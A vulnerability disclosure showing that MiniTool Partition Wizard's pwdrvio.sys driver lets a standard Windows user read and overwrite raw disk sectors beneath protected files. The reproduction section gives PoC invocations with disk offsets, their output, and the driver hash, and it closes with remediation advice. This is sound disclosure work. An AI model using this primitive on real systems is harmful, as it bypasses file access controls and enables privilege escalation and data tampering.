Skip to main content

MiniTool Partition Wizard Kernel Driver pwdrvio.sys Arbitrary Read and Write

MiniTool Partition Wizard Kernel Driver Allows Standard Users to Read and Write Raw Disk Sectors

Summary

MiniTool Partition Wizard DEMO 13.6 installs the signed kernel driver pwdrvio.sys. The driver exposes \\.\PartitionWizardDiskAccesser\<disk_number> and forwards read, write, and disk IOCTL requests to the lower disk device from kernel context.

In the validation below, a standard user at Medium Integrity could not directly read or write a protected file on a temporary VHD and could not directly open \\.\PhysicalDrive1. The same standard user used pwdrvio.sys to read the protected file's NTFS data clusters from the raw disk and then overwrite those clusters. After remounting the VHD, the protected file contained the low-user supplied marker.

Affected Product and Version

  • Product: MiniTool Partition Wizard DEMO
  • Tested version: 13.6
  • Driver: pwdrvio.sys
  • Driver SHA-256: 0489B3DEC6A33E50D8A48A8DAD3F5B923A81F7300E4A71358D90D2879BAC9AA2

Download URL and SHA-256

  • Download page: https://www.partitionwizard.com/download.html
  • Download URL: https://cdn2.minitool.com/?e=pw-demo&p=pw
  • File name used for validation: pw_demo_installer.exe
  • Installer SHA-256: DBF366FEDD9773D2B336A11180AA00CAFF0F066EF17061C022ACEDBC3548B0FB
  • Installer version: 13.6
  • Installer signature: Valid, MiniTool Software Limited
  • Driver signature: Valid, MiniTool Solution Ltd

Vulnerability Type

Local privilege escalation primitive / raw disk read-write access-control bypass through a kernel driver.

Impact

A low-privileged local user can bypass Windows file and raw-disk access controls by reading and writing raw disk sectors through pwdrvio.sys. This can expose protected file content and can modify protected files by writing their underlying NTFS data clusters.

The proof used a temporary VHD and a self-created protected marker file. The same primitive could be used against sensitive files or filesystem metadata on real disks if the vulnerable driver is installed and reachable.

Test Environment

  • OS: Windows x64 test VM
  • Administrator account used only for installation, VHD setup, and cleanup
  • Test user: standard user EXPDEV\low
  • Test user integrity: Medium Integrity
  • Test user groups: BUILTIN\Users, not BUILTIN\Administrators
  • Controlled disk: temporary VHD attached as disk 1
  • Protected test object: R:\protected\admin_only_flag.bin

Driver Load / Setup Steps

The official MiniTool Partition Wizard DEMO 13.6 installer was downloaded from the vendor CDN and verified. It was installed silently:

pw_demo_installer.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-

The installer created and started the pwdrvio kernel service:

SERVICE_NAME: pwdrvio
TYPE               : 1  KERNEL_DRIVER
STATE              : 4  RUNNING
BINARY_PATH_NAME   : \SystemRoot\system32\pwdrvio.sys

A temporary VHD was created, formatted NTFS, and assigned drive letter R:. An administrator created a protected marker file on that VHD and removed inheritance so only Administrators and SYSTEM had access:

New-Item -ItemType Directory R:\protected
[IO.File]::WriteAllBytes('R:\protected\admin_only_flag.bin', $markerBytes)
icacls R:\protected\admin_only_flag.bin /inheritance:r /grant:r 'Administrators:F' 'SYSTEM:F'

The file's NTFS extent was resolved with fsutil file queryextents. The first data run began at disk offset 5865472 and was 20480 bytes long on disk 1.

Reproduction Steps

Run the baseline as the standard user:

whoami /all
[IO.File]::ReadAllBytes('R:\protected\admin_only_flag.bin')
[IO.File]::WriteAllText('R:\protected\admin_only_flag.bin', 'SHOULD-NOT-WRITE')
[IO.File]::Open('\\.\PhysicalDrive1', [IO.FileMode]::Open, [IO.FileAccess]::ReadWrite, [IO.FileShare]::ReadWrite)

Observed:

expdev\low
BUILTIN\Users
Mandatory Label\Medium Mandatory Level
READ-FAILED: Access to the path 'R:\protected\admin_only_flag.bin' is denied.
WRITE-FAILED: Access to the path 'R:\protected\admin_only_flag.bin' is denied.
RAW-OPEN-FAILED: Access to the path '\\.\PhysicalDrive1' is denied.

Read the protected file's raw data clusters through the driver as the same standard user:

minitool_pwdrvio_disk_forwarder_poc.exe --disk 1 --read --offset 5865472 --length 20480 --out exploit_read_clusters.bin

Observed:

read 20480 bytes from disk 1 offset 5865472 via pwdrvio forwarder
0000  4d 49 4e 49 54 4f 4f 4c 2d 50 57 44 52 56 49 4f
0010  2d 50 52 4f 54 45 43 54 45 44 2d 46 4c 41 47 2d

The extracted cluster data contained:

MINITOOL-PWDRVIO-PROTECTED-FLAG-cb09e8c5-5583-4bfd-b7db-75d54699bb4f

Dismount the VHD volume, then overwrite only the same controlled file data run as the standard user:

mountvol R: /p
minitool_pwdrvio_disk_forwarder_poc.exe --disk 1 --write --offset 5865472 --in controlled_write_payload.bin --dangerous-write

Observed:

wrote 20480 bytes to disk 1 offset 5865472 via pwdrvio forwarder

Reassign the VHD drive letter and read the protected file as administrator. The file now contains:

MINITOOL-PWDRVIO-WRITE-FLAG-1bb2fd73-db86-41b4-9ffa-83ec90f89d24

Baseline Evidence

  • baseline_direct_access.txt shows the test user is EXPDEV\low, belongs to BUILTIN\Users, and runs at Medium Integrity.
  • The same baseline shows direct read and direct write access to the protected marker file failed with access denied.
  • The same baseline shows direct read-write open of \\.\PhysicalDrive1 failed with access denied.

Exploit Evidence

  • exploit_geometry.txt shows a disk geometry IOCTL succeeded through \\.\PartitionWizardDiskAccesser\1.
  • exploit_read_stdout.txt shows the standard user read 20480 bytes from disk 1 offset 5865472 through pwdrvio.sys.
  • exploit_read_marker.json confirms the raw data contained the protected marker string.
  • exploit_write_stdout.txt shows the standard user wrote 20480 bytes to the same disk offset through pwdrvio.sys.
  • admin_flag_after_write.json confirms the protected file contained the new write marker after remount.

Why This Proves the Vulnerability

The test user is a standard user at Medium Integrity. Windows correctly denied that user direct file access and direct raw-disk access. The same user could access the protected file contents and overwrite them through pwdrvio.sys, because the driver exposes raw disk reads and writes without enforcing the caller's normal Windows access checks.

This demonstrates a practical protected-file read/write impact using a controlled VHD and a self-created protected flag file.

Cleanup Steps

Dismount-DiskImage -ImagePath C:\ProgramData\VendorRepro\minitool_pwdrvio\controlled_disk.vhd
C:\Program\unins000.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART
sc.exe stop pwdrvio
sc.exe delete pwdrvio
sc.exe delete pwdspio
Remove-Item C:\ProgramData\VendorRepro\minitool_pwdrvio -Recurse -Force

Cleanup was confirmed: the VHD was dismounted, the product uninstaller exited successfully, pwdrvio was deleted, and the runtime test directory no longer existed.

Suggested Remediation

  • Do not expose raw disk read/write forwarding to low-privileged callers.
  • Restrict the device object ACL with IoCreateDeviceSecure or an INF SDDL so only trusted administrative service components can open the device.
  • Impersonate the caller and require normal Windows access checks before opening or forwarding operations to disk devices.
  • Remove generic disk IOCTL forwarding or replace it with a strict allowlist of non-sensitive operations.
  • Add explicit authorization checks for all write-capable and raw-disk-capable IOCTL/read/write paths.
Back to top